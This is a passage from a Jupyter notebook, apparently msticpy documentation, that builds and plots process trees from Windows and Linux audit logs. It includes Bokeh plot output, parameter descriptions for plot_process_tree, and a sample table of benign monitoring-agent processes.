AAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[658]}},\"selected\":{\"id\":\"1045\"},\"selection_policy\":{\"id\":\"1046\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"range\":{\"id\":\"1007\"},\"value\":1.8},\"id\":\"1063\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1162\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1009\"},\"value\":0.25},\"id\":\"1064\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1105\",\"type\":\"Dodge\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1069\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1063\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1064\"}}},\"id\":\"1067\",\"type\":\"Text\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1066\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1067\"},\"selection_glyph\":null,\"view\":{\"id\":\"1069\"}},\"id\":\"1068\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1063\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1064\"}}},\"id\":\"1066\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1083\"}],\"center\":[{\"id\":\"1086\"},{\"id\":\"1090\"}],\"left\":[{\"id\":\"1087\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1109\"}],\"title\":{\"id\":\"1134\"},\"toolbar\":{\"id\":\"1098\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1075\"},\"x_scale\":{\"id\":\"1079\"},\"y_range\":{\"id\":\"1077\"},\"y_scale\":{\"id\":\"1081\"}},\"id\":\"1074\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1110\",\"type\":\"CDSView\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1070\",\"type\":\"FixedTicker\"},{\"attributes\":{\"end\":10,\"start\":1},\"id\":\"1007\",\"type\":\"Range1d\"},{\"attributes\":{\"factors\":[\"LOCAL SERVICE\",\"MSTICAdmin\",\"MSTICAlertsWin1$\"],\"palette\":[\"#440154\",\"#208F8C\",\"#FDE724\"]},\"id\":\"1003\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1072\",\"type\":\"FixedTicker\"},{\"attributes\":{},\"id\":\"1075\",\"type\":\"DataRange1d\"},{\"attributes\":{\"end\":659,\"start\":-1},\"id\":\"1077\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1079\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"LinearScale\"},{\"attributes\":{\"formatter\":{\"id\":\"1162\"},\"ticker\":{\"id\":\"1084\"},\"visible\":false},\"id\":\"1083\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1084\",\"type\":\"BasicTicker\"},{\"attributes\":{\"range\":{\"id\":\"1007\"},\"value\":1.75},\"id\":\"1034\",\"type\":\"Dodge\"},{\"attributes\":{\"axis\":{\"id\":\"1019\"},\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":null,\"visible\":false},\"id\":\"1022\",\"type\":\"Grid\"},{\"attributes\":{\"axis\":{\"id\":\"1083\"},\"grid_line_color\":null,\"ticker\":null},\"id\":\"1086\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"1160\"},\"ticker\":{\"id\":\"1088\"},\"visible\":false},\"id\":\"1087\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"1042\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1020\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1088\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1072\"}},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1003\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1034\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1036\",\"type\":\"Rect\"},{\"attributes\":{\"axis\":{\"id\":\"1087\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1090\",\"type\":\"Grid\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1107\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1108\"},\"selection_glyph\":null,\"view\":{\"id\":\"1110\"}},\"id\":\"1109\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"axis_line_color\":null,\"formatter\":{\"id\":\"1044\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"1070\"},\"visible\":false},\"id\":\"1015\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1091\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1092\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"overlay\":{\"id\":\"1097\"}},\"id\":\"1093\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1094\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1095\",\"type\":\"ResetTool\"},{\"attributes\":{\"end\":659,\"start\":638},\"id\":\"1009\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1096\",\"type\":\"HelpTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1003\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1105\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1107\",\"type\":\"Rect\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1097\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"1003\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1105\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1108\",\"type\":\"Rect\"},{\"attributes\":{\"overlay\":{\"id\":\"1112\"},\"x_range\":null,\"y_range\":{\"id\":\"1009\"}},\"id\":\"1111\",\"type\":\"RangeTool\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1112\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1018\"},{\"id\":\"1022\"},{\"id\":\"1047\"}],\"left\":[{\"id\":\"1019\"}],\"outline_line_color\":null,\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1038\"},{\"id\":\"1054\"},{\"id\":\"1061\"},{\"id\":\"1068\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1027\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"children\":[{\"id\":\"1004\"},{\"id\":\"1074\"}]},\"id\":\"1116\",\"type\":\"Row\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1117\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1135\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1117\"},\"title\":\"TimeGenerated\"},\"id\":\"1118\",\"type\":\"TableColumn\"}],\"root_ids\":[\"1131\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n", " var render_items = [{\"docid\":\"8661baa3-6348-44c9-825c-737061f29008\",\"root_ids\":[\"1131\"],\"roots\":{\"1131\":\"8171900f-abd0-4403-aa70-9e8ace735f15\"}}];\n", " root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n", "\n", " }\n", " if (root.Bokeh !== undefined) {\n", " embed_document(root);\n", " } else {\n", " var attempts = 0;\n", " var timer = setInterval(function(root) {\n", " if (root.Bokeh !== undefined) {\n", " clearInterval(timer);\n", " embed_document(root);\n", " } else {\n", " attempts++;\n", " if (attempts > 100) {\n", " clearInterval(timer);\n", " console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n", " }\n", " }\n", " }, 10, root)\n", " }\n", "})(window);" ], "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1131" } }, "output_type": "display_data" }, { "data": { "text/plain": [ "(Figure(id='1004', ...), Column(id='1131', ...))" ] }, "execution_count": 3, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_tree = ptree.get_descendents(p_tree_win, ptree.get_roots(p_tree_win).iloc[2])\n", "nbdisplay.plot_process_tree(data=proc_tree, legend_col=\"SubjectUserName\", show_table=True)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Plotting Syntax\n", "\n", "nbdisplay.plot_process_tree(\n", " data,\n", " schema=None,\n", " output_var=None,\n", " legend_colNone,\n", " show_table=False,\n", ")\n", "\n", "### Parameter descriptions\n", "----------\n", "\n", "#### data : pd.DataFrame\n", "- DataFrame containing one or more Process Trees. This should be the output of `build_process_tree` described above.\n", "\n", "#### schema : ProcSchema, optional\n", "- The data schema to use for the data set, by default None. If None the schema is inferred. A schema object maps generic field names (e.g. `process_name`) on to a data-specific name (e.g. `exe` in the case of Linux audit data). This is usually not required since the function will try to infer the schema from fields in the input DataFrame.\n", "\n", "#### output_var : str, optional\n", "- Output variable for selected items in the tree, by default None. Setting this lets you return the keys of any items selected in the bokeh plot. For example, if you supply the string \"my_results\" and then select one or more processes in the tree, the Python variable `my_results` will be populated with a list of keys (index items) of the corresponding rows in the input DataFrame.\n", "\n", "#### legend_col : str, optional\n", "- The column used to color the tree items, by default None. If this column is a string, the values will be treated as categorical data and map unique values to different colors and display a legend of the mapping. If this column is a numeric or datetime value, the values will be treated as continuous and a color gradient bar will be displayed indicating the mapping of values on to the color gradient.\n", "\n", "#### show_table: bool\n", "- Set to True to show the data table, by default False. Shows the source values as a data table beneath the process tree.\n", "\n", "---\n", "\n", "### Caveats\n", "#### Large data sets (more than a few hundred processses)\n", "These will normally be handled well by the Bokeh plot (up to multiple tens of thousands or more) but it will make navigation of the tree difficult. In particular, the range tool (on the right of the main plot) will be difficult to manipulate. Split the input data into smaller chunks before plotting.\n", "\n", "#### Font Size\n", "The font size does not scale based on how much data is shown. If you use the range tool to select too large a subset of the data in the main plot, the font will become unreadable. If this happens, use the `reset` tool to set the plot back to its defaults.\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Linux Process Tree\n", "\n", "**Note** This assumes that the Linux audit log has been read from a file using [msticpy.sectools.auditdextract.read_from_file()](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html#msticpy.sectools.auditdextract.read_from_file) or read from Azure Sentinel/Log Analytics using the LinuxAudit.auditd_all query and processed using [msticpy.sectools.auditdextract.extract_events_to_df()`](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html#msticpy.sectools.auditdextract.extract_events_to_df) function.\n", "\n", "Using either of these, the process exec events related to a single process start are merged into a single row.\n" ] }, { "cell_type": "code", "execution_count": 4, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:30.161996Z", "start_time": "2020-08-25T15:53:29.916001Z" }, "execution_event_id": "b292254e-8516-48a9-8d6b-efcf9c1df1a8", "last_executed_text": "linux_proc_test = linux_proc.iloc[:1000]\np_tree_l = ptutil.build_process_tree(linux_proc_test, show_progress=True, debug=True)", "persistent_id": "f60daf1c-6e02-437f-b160-119cabaf78ad", "scrolled": true }, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "e5fee0cf9f5b41c4923aeb1526a22e84", "version_major": 2, "version_minor": 0 }, "text/plain": [ "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" ] }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": [ "Original # procs 1000\n", "Merged # procs 1000\n", "Merged # procs - dropna 295\n", "Unique merged_procs index in merge 1000\n", "These two should add up to top line\n", "Rows with dups 0\n", "Rows with no dups 1000\n", "0 + 1000 = 1000\n", "original: 1000 inferred_parents 29 combined 1029\n", "has parent time 1000\n", "effectivelogonId in subjectlogonId 1029\n", "parent_proc_lc in procs 1000\n", "ProcessId in ParentProcessId 532\n", "Parent_key in proc_key 1000\n", "Parent_key not in proc_key 29\n", "Parent_key is NA 29\n", "{'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n" ] } ], "source": [ "linux_proc = pd.read_pickle(\"data/linux_proc_test.pkl\")\n", "p_tree_lx = ptree.build_process_tree(linux_proc, show_progress=True, debug=True)" ] }, { "cell_type": "code", "execution_count": 5, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:30.240997Z", "start_time": "2020-08-25T15:53:30.163996Z" } }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Full tree size: 64\n" ] }, { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
EventIDTenantIdComputermssg_idTimeGenerateda0a1a2argcauid...TimeGenerated_orig_parNewProcessId_parParentProcessNameparent_proc_lcparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
unknown13501970-01-01 00:00:00.000000SYSCALL_EXECVE52b1ab41-869e-4138-9e40-2a4457f09bf0MSTICAlertsLxVM2NaN1970-01-01 00:00:00.000NaNNaNNaNNaNNaN...NaTNaNNaNNaNNaNTrueFalseFalse1002NaN
/usr/bin/sudo263732019-02-17 22:01:26.357000SYSCALL_EXECVE52b1ab41-869e-4138-9e40-2a4457f09bf0MSTICAlertsLxVM21550440886.357:89728542019-02-17 22:01:26.357sudo/opt/microsoft/omsagent/ruby/bin/ruby/opt/microsoft/omsagent/plugin/tailfilereader.rb6-1...1970-01-01 00:00:00.0001350unknownunknownunknown13501970-01-01 00:00:00.000000FalseFalseTrue1002/1591002
/opt/microsoft/omsagent/ruby/bin/ruby263752019-02-17 22:01:26.369000SYSCALL_EXECVE52b1ab41-869e-4138-9e40-2a4457f09bf0MSTICAlertsLxVM21550440886.369:89728582019-02-17 22:01:26.369/opt/microsoft/omsagent/ruby/bin/ruby/opt/microsoft/omsagent/plugin/tailfilereader.rb/var/log/audit/audit.log5-1...2019-02-17 22:01:26.357NaN/usr/bin/sudo/usr/bin/sudo/usr/bin/sudo263732019-02-17 22:01:26.357000FalseFalseTrue1002/159/160159
/usr/bin/sudo263772019-02-17 22:01:26.449000SYSCALL_EXECVE52b1ab41-869e-4138-9e40-2a4457f09bf0MSTICAlertsLxVM21550440886.449:89728592019-02-17 22:01:26.449sudotest-f4-1...2019-02-17 22:01:26.369NaN/opt/microsoft/omsagent/ruby/bin/ruby/opt/microsoft/omsagent/ruby/bin/ruby/opt/microsoft/omsagent/ruby/bin/ruby263752019...FalseFalseTrue1002/159/160/161160
/usr/bin/test263782019-02-17 22:01:26.465000SYSCALL_EXECVE52b1ab41-869e-4138-9e40-2a4457f09bf0MSTICAlertsLxVM21550440886.465:89728632019-02-17 22:01:26.465test-f/var/log/audit/audit.log3-1...2019-02-17 22:01:26.449NaN/usr/bin/sudo/usr/bin/sudo/usr/bin/sudo263772019-02-17 22:01:26.449000FalseTrueFalse1002/159/160/161/162161
\n", "

5 rows × 41 columns

\n", "
" ], "text/plain": [ " EventID \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 SYSCALL_EXECVE \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 SYSCALL_EXECVE \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... SYSCALL_EXECVE \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 SYSCALL_EXECVE \n", "/usr/bin/test263782019-02-17 22:01:26.465000 SYSCALL_EXECVE \n", "\n", " TenantId \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "\n", " Computer \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 MSTICAlertsLxVM2 \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 MSTICAlertsLxVM2 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... MSTICAlertsLxVM2 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 MSTICAlertsLxVM2 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 MSTICAlertsLxVM2 \n", "\n", " mssg_id \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 1550440886.357:8972854 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 1550440886.369:8972858 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 1550440886.449:8972859 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 1550440886.465:8972863 \n", "\n", " TimeGenerated \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 1970-01-01 00:00:00.000 \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 2019-02-17 22:01:26.357 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 2019-02-17 22:01:26.369 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 2019-02-17 22:01:26.449 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 2019-02-17 22:01:26.465 \n", "\n", " a0 \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 sudo \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... /opt/microsoft/omsagent/ruby/bin/ruby \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 sudo \n", "/usr/bin/test263782019-02-17 22:01:26.465000 test \n", "\n", " a1 \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 /opt/microsoft/omsagent/ruby/bin/ruby \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... /opt/microsoft/omsagent/plugin/tailfilereader.rb \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 test \n", "/usr/bin/test263782019-02-17 22:01:26.465000 -f \n", "\n", " a2 \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 /opt/microsoft/omsagent/plugin/tailfilereader.rb \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... /var/log/audit/audit.log \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 -f \n", "/usr/bin/test263782019-02-17 22:01:26.465000 /var/log/audit/audit.log \n", "\n", " argc auid ... \\\n", "proc_key ... \n", "unknown13501970-01-01 00:00:00.000000 NaN NaN ... \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 6 -1 ... \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 5 -1 ... \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 4 -1 ... \n", "/usr/bin/test263782019-02-17 22:01:26.465000 3 -1 ... \n", "\n", " TimeGenerated_orig_par \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaT \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 1970-01-01 00:00:00.000 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 2019-02-17 22:01:26.357 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 2019-02-17 22:01:26.369 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 2019-02-17 22:01:26.449 \n", "\n", " NewProcessId_par \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 1350 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... NaN \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 NaN \n", "/usr/bin/test263782019-02-17 22:01:26.465000 NaN \n", "\n", " ParentProcessName \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 unknown \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... /usr/bin/sudo \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 /opt/microsoft/omsagent/ruby/bin/ruby \n", "/usr/bin/test263782019-02-17 22:01:26.465000 /usr/bin/sudo \n", "\n", " parent_proc_lc \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 unknown \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... /usr/bin/sudo \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 /opt/microsoft/omsagent/ruby/bin/ruby \n", "/usr/bin/test263782019-02-17 22:01:26.465000 /usr/bin/sudo \n", "\n", " parent_key \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 unknown13501970-01-01 00:00:00.000000 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... /usr/bin/sudo263732019-02-17 22:01:26.357000 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 /opt/microsoft/omsagent/ruby/bin/ruby263752019... \n", "/usr/bin/test263782019-02-17 22:01:26.465000 /usr/bin/sudo263772019-02-17 22:01:26.449000 \n", "\n", " IsRoot IsLeaf IsBranch \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 True False False \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 False False True \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... False False True \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 False False True \n", "/usr/bin/test263782019-02-17 22:01:26.465000 False True False \n", "\n", " path \\\n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 1002 \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 1002/159 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 1002/159/160 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 1002/159/160/161 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 1002/159/160/161/162 \n", "\n", " parent_index \n", "proc_key \n", "unknown13501970-01-01 00:00:00.000000 NaN \n", "/usr/bin/sudo263732019-02-17 22:01:26.357000 1002 \n", "/opt/microsoft/omsagent/ruby/bin/ruby263752019-... 159 \n", "/usr/bin/sudo263772019-02-17 22:01:26.449000 160 \n", "/usr/bin/test263782019-02-17 22:01:26.465000 161 \n", "\n", "[5 rows x 41 columns]" ] }, "execution_count": 5, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Take one of those roots and get the full tree beneath it\n", "t_root = ptree.get_roots(p_tree_lx).iloc[2]\n", "full_tree = ptree.get_descendents(p_tree_lx, t_root)\n", "print(\"Full tree size:\", len(full_tree))\n", "full_tree.head()" ] }, { "cell_type": "code", "execution_count": 6, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:30.367996Z", "start_time": "2020-08-25T15:53:30.244997Z" }, "persistent_id": "77bbbefd-2888-4127-b95a-18e2f1030039" }, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": [ "\n", "(function(root) {\n", " function now() {\n", " return new Date();\n", " }\n", "\n", " var force = true;\n", "\n", " if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n", " root._bokeh_onload_callbacks = [];\n", " root._bokeh_is_loading = undefined;\n", " }\n", "\n", " var JS_MIME_TYPE = 'application/javascript';\n", " var HTML_MIME_TYPE = 'text/html';\n", " var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n", " var CLASS_NAME = 'output_bokeh rendered_html';\n", "\n", " /**\n", " * Render data to the DOM node\n", " */\n", " function render(props, node) {\n", " var script = document.createElement(\"script\");\n", " node.appendChild(script);\n", " }\n", "\n", " /**\n", " * Handle when an output is cleared or removed\n", " */\n", " function handleClearOutput(event, handle) {\n", " var cell = handle.cell;\n", "\n", " var id = cell.output_area._bokeh_element_id;\n", " var server_id = cell.output_area._bokeh_server_id;\n", " // Clean up Bokeh references\n", " if (id != null && id in Bokeh.index) {\n", " Bokeh.index[id].model.document.clear();\n", " delete Bokeh.index[id];\n", " }\n", "\n", " if (server_id !== undefined) {\n", " // Clean up Bokeh references\n", " var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n", " cell.notebook.kernel.execute(cmd, {\n", " iopub: {\n", " output: function(msg) {\n", " var id = msg.content.text.trim();\n", " if (id in Bokeh.index) {\n", " Bokeh.index[id].model.document.clear();\n", " delete Bokeh.index[id];\n", " }\n", " }\n", " }\n", " });\n", " // Destroy server and session\n", " var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n", " cell.notebook.kernel.execute(cmd);\n", " }\n", " }\n", "\n", " /**\n", " * Handle when a new output is added\n", " */\n", " function handleAddOutput(event, handle) 